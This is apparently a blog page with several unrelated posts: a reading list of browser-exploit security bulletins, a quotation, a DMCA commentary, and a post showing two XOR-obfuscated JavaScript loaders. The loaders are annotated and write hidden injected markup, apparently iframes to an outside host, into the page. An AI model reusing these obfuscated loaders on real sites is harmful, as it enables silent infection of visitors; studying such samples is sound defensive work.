Great Reading List on Web Exploits

I was reading up on inet-lux and found a great blog post in Spanish which provides a must-read reference list. I ended up here reading about a Java-based botnet tool I found while researching appeals today. I hope to have more on that later but have not had time to decompile it. Anyone want to donate an IDA Pro license?

[1]:
Microsoft Security Bulletin MS06-014
Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx

Microsoft Security Bulletin MS03-011
Flaw in Microsoft VM Could Enable System Compromise (816093)
http://www.microsoft.com/technet/security/bulletin/ms03-011.mspx

Microsoft Internet Explorer JavaScript window() Vulnerability:
Microsoft Security Bulletin MS05-054
Cumulative Security Update for Internet Explorer (905915)
http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx

Microsoft Security Bulletin MS06-006
Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx

Mozilla Foundation Security Advisory 2005-50
Exploitable crash in InstallVersion.compareTo() (Firefox, Mozilla Suite)
http://www.mozilla.org/security/announce/2005/mfsa2005-50.html

Microsoft Security Advisory (917077)
Vulnerability in the way HTML Objects Handle Unexpected Method Calls Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/917077.mspx

IE ms-its: and mk:@MSITStore: vulnerability:
Microsoft Security Bulletin MS04-013
Cumulative Security Update for Outlook Express (837009)
http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx

[2]:
http://www.enciclopediavirus.com/virus/vervirus.php?id=3456

Source: http://www.rzw.com.ar
___

Musings of a Chinese Vegetarian

Evil is the most dangerous when done in secret. Good is the least admirable when performed in public. In other words, evil is less dangerous when it is manifest than when it is secret; good is more laudable when it is occult than when it is public.

translated by Yaichiro Isobe

User Generated Content

credit: Jason Arends

New JavaScript exploit style

Now with passwords?

<script language="JavaScript" type="text/javascript">
<!--
// "password" is a misnomer: it is a percent-encoded, XOR-obfuscated block of HTML.
var password='5%60o%7Bhdl%29z%7Bj4+a%7D' +
'%7Dy3%26%26fzlq%27ah%7Bm%24jf%7Bl%24qqq' +
'%27jfd%26%7Bhgm%27yay+%29%7E%60m' +
'%7Da4899%2C%29al%60na%7D48%3B99%29DH' +
'%5BN@G%5E@M%5DA49%29DH%5BN@GAL@NA' +
'%5D49%29AZYHJL49%29_ZYHJL49%29O%5B' +
'HDLKF%5BML%5B49%29ZJ%5BFEE4GF75%26' +
'%60o%7Bhdl75a%7B%29%7E%60m%7Da4+%3E' +
'%3F9+%29z%60sl4+8+75m%60%7F%29z%7D' +
'pel4+yfz%60%7D%60fg3%29hkzfe%7C%7Dl2%29' +
'elo%7D3%29%2400000yq2%29%7Dfy3%29%24' +
'00000yq2%29%7E%60m%7Da3%298yq2%29al' +
'%60na%7D3%298yq2+7';

// ID is the string '9'; the ^ operator coerces it to the number 9, so every
// byte is XORed with 0x09 (not with 0x39, the character '9'). The decoded
// markup is written straight into the page, so it executes on load.
function get(key){
  var ID='9';var out="";var i;
  for(i=0;i<key.length;i++){out+=String.fromCharCode(ID^key.charCodeAt(i));}
  return out;
}
document.write(get(unescape(password)));
//-->
</script>

<script language="JavaScript" type="text/javascript">
<!--
// Same scheme, shorter payload: percent-encoded HTML XORed with the single byte 0x09.
var password='5%60o%7Bhdl%29z%7Bj4+a%7D%7Dy3' +
'%26%2618%27%3B0%27%3B%3D8' +
'%27%3B%3A%3F%26hjj%3B%26%7Ef%7Bb988' +
'%3B%26%60gmlq%27yay+%29%7E%60m' +
'%7Da48%29al%60na%7D4875%26%60o%7Bhdl7';

// Identical decoder to the first script; ID coerces to the number 9 in the XOR.
function get(key){
  var ID='9';var out="";var i;
  for(i=0;i<key.length;i++){out+=String.fromCharCode(ID^key.charCodeAt(i));}
  return out;
}
document.write(get(unescape(password)));
//-->
</script>

Aspects of the DMCA posting “The Key” violates

According to an article posted by the EFF's von Lohmann, posting “The Key” will certainly violate aspects of the oft-hated DMCA. A growing number of citizens in the US are starting to recognize just how badly the law conflicts with other rights guaranteed to US citizens.

No person shall … offer to the public, provide, or otherwise traffic in any technology, product, service, device, component, or part thereof that –

(A) is primarily designed or produced for the purpose of circumventing a technological measure that effectively controls access to a work protected under this title;

(B) has only limited commercially significant purpose or use other than to circumvent a technological measure that effectively controls access to a work protected under this title; or

(C) is marketed by that person or another acting in concert with that person with that person’s knowledge for use in circumventing a technological measure that effectively controls access to a work protected under this title.

Companies like Cafe Press could find themselves facing criminal charges if certain passages of the DMCA are interpreted unfavorably.

If the offense is “willful and for purposes of commercial gain,” federal prosecutors can bring criminal charges. The EFF article notes that this provision has only been used against commercial piracy until now, but that doesn't rule out the possibility. Technically, selling a T-shirt or trucker hat on Cafe Press with the 16-byte hex key is commercial trafficking in a decryption device, if the AACS LA lawyers are to be believed.